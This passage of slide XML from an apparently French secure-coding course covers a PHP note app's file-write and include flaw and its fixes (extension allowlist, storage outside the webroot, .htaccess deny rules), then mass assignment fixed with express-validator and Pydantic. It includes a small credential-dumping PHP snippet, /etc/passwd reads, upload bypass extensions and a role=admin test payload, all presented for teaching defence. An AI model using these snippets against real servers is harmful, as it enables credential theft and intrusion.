                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>file_put_contents(clip_path($name), $_POST["body"]);  // y compris .php</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Ce que vous collez dans oops.php</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&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>include __DIR__ . "/../settings.php";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo "db_user=$db_user\n";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo "db_pass=$db_pass\n";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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Pas un parser HTML. Un include. textContent ne sauve rien : le mal est côté serveur.</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02 · correctif</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="987552"/>
            <a:ext cx="10058400" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Si le PHP tourne, vous avez la machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="170078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1005840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settings.php hors du webroot : insuffisant. getenv(), phpinfo(), file_get_contents("/etc/passwd").</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Empêcher de sauver du .php, c’est un début. .phtml, .phar, un .htaccess qui rallume le moteur : ça contourne.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>La règle : un fichier que l’utilisateur écrit n’est JAMAIS exécuté par PHP. Jamais include. Jamais dans un dossier où le moteur tourne.</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02 · cadenas 1</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Refuser .php. Afficher du texte. Jamais include.</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À coller dans index.php  ·  save + show</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function save_note($name, $body) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    $ok = ["txt", "md", "html"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    if (!in_array($ext, $ok, true)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        http_response_code(400);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        exit("extension refusee");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    file_put_contents(clip_path($name), $body);</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function show_note($name) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    header("Content-Type: text/plain; charset=utf-8");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    echo file_get_contents(clip_path($name));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    // JAMAIS include clip_path($name);</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Testez : sauver hack.php → 400. Ouvrir un .txt → du texte. Run / include : plus rien.</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02 · cadenas 2</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Les fichiers utilisateur : hors du document root</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index.php  ·  $clip + realpath</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 public_html/index.php     ← le web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// ../data/notes/            ← les fichiers. Apache ne les sert pas.</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$clip = dirname(__DIR__) . "/data/notes";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$path = realpath($clip . "/" . $name);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$root = realpath($clip);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>if ($path === false || !str_starts_with($path, $root . DIRECTORY_SEPARATOR)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    http_response_code(400);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    exit("hors de data/notes");</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settings.php, .env, le reste du disque : inatteignable par l’URL. Toujours vérifier realpath, sinon ../../ etc/passwd.</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02 · cadenas 3</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.htaccess : ceinture, si un dossier est encore public</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data/.htaccess  ·  à poser dans le dossier des uploads</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&lt;FilesMatch "\.(php|phtml|phar|htaccess)$"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  Require all denied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/FilesMatch&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>php_flag engine off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>AddType text/plain .php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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Testez l’URL publique d’un .php : 403. Nginx : location ~ \.php$ { deny all; }. Ce n’est pas le seul cadenas — un .htaccess uploadé peut rallumer le moteur. D’où l’allowlist, d’où hors webroot.</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89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trouver un secret dans un plugin « free »</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 pas de .php » ne suffit pas</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les trois cadenas</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269187" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Easy Clipboard</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trouver un secret dans un plugin « free »</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settings.php dans le webroot. La sidebar le liste. C’est déjà fini.</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pourquoi « pas de .php » ne suffit pas</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Un .phtml, un getenv(), un include. Si PHP tourne, la machine est à vous.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="334670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45643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47472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les trois cadenas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="380390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Hors webroot. Allowlist. Jamais include. .htaccess en ceinture.</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91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03</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Valider le JSON, Flask et Express</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Pydantic  ·  express-validator  ·  après avoir tout cassé</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1</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Le body n’est pas une fiche utilisateur</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…request.body recopie tout : y compris role. Le client choisit d’être admin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un schéma (Pydantic, express-validator) nomme les champs autorisés. Rien d’autre.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d2s3-spread-body.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1591056"/>
            <a:ext cx="10149840" cy="1303144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2949064"/>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Toujours vulnérable au départ. Le schéma doit protéger cette ligne.</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Express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Un schéma simple. user, pwd. Pas role.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="11155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express-validator  ·  checkSchema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1389888"/>
            <a:ext cx="10058400" cy="3685031"/>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389888"/>
            <a:ext cx="64008" cy="3685031"/>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207008" y="1463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checkSchema  ·  les champs autorisés</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="1700784"/>
            <a:ext cx="9729216" cy="3300983"/>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app.post("/api/register", checkSchema({</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  user: { isString: true, isLength: { options: { min: 2, max: 32 } }, trim: true },</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  pwd:  { isString: true, isLength: { options: { min: 8, max: 64 } } },</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>}), (req, res) =&gt; {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  if (!validationResult(req).isEmpty()) return res.status(400).json({ error: "schema" });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  const { user, pwd } = matchedData(req);  // role: pas dans le schéma</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  users.push({ id: randomUUID(), role: "user", user, pwd });</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
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>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matchedData ne sort que ce que le schéma a nommé. Plus de ...request.body.</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Flask</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Le même contrat, Pydantic</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BaseModel  ·  user, pwd. Pas role.</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from pydantic import BaseModel, Field</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class Register(BaseModel):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    user: str = Field(min_length=2, max_length=32)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    pwd: str = Field(min_length=8, max_length=64)</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data = Register.model_validate(request.json)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># data.role n'existe pas. extra="ignore" par défaut.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>users.append({"id": str(uuid4()), "role": "user", **data.model_dump()})</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="10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Le serveur pose role. Le client ne le propose pas.</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à vous</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Ouvrez day-2. Protégez cette ligne.</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day-2/s3_02_validate_register  ·  node-express et python-flask.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Votre tour : poser le schéma. Plus de ...request.body.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d2s3-validate-register.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1558811" y="1591056"/>
            <a:ext cx="9043897"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https://github.com/Dercetech/training-secu-5d/tree/main/day-2/s3_02_validate_register</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s3_02</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Votre tour : valider /api/register</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day-2/s3_02_validate_register</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day-2/s3_02_validate_register</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s3_01_unsafe_register : le spread. s3_02 : vous posez le schéma.</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README : user, pwd. role n’est pas un champ client.</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Express : checkSchema. Flask : Pydantic. Les deux dossiers sont là.</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Un register qui refuse role=admin dans le body.</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Ouvrir day-2/s3_02_validate_register. Lire le README.</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Express : checkSchema + matchedData. Flask : BaseModel.</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POST avec {"user":"x","pwd":"xxxxxxxx","role":"admin"} → role reste user.</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s3_03</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Valider un vrai objet imbriqué</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day-2/s3_03_complex_schema. Le serveur enregistre tout l’objet. À vous le contrat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Obligatoire, optionnel, nullable, inconnu : la colonne de droite. Modifiez, cassez, validez.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d2s3-complex-schema.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3347516" y="1591056"/>
            <a:ext cx="5466487"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POST /api/briefs  ·  title, owner, participants, tags, delivery.</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s3_03  ·  extra</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Pratique supplémentaire : un JSON réel</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day-2/s3_03_complex_schema</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day-2/s3_03_complex_schema</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Objets, tableaux, null. Pas un user/pwd.</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La colonne de droite est le contrat. Vous l’écrivez. Express ou Flask.</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Changez une valeur. Le schéma doit dire non.</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Un schéma qui refuse le champ inconnu et accepte mentor: null.</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Ouvrir day-2/s3_03_complex_schema. Lire le contrat à droite.</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Poser le schéma. Tester title trop court, email cassé, un champ en trop.</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mentor: null doit passer. tags absent aussi, tags: null non.</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99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03 · docs</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Les docs. Puis les deux cas qui coinceront.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1060704"/>
            <a:ext cx="10058400" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
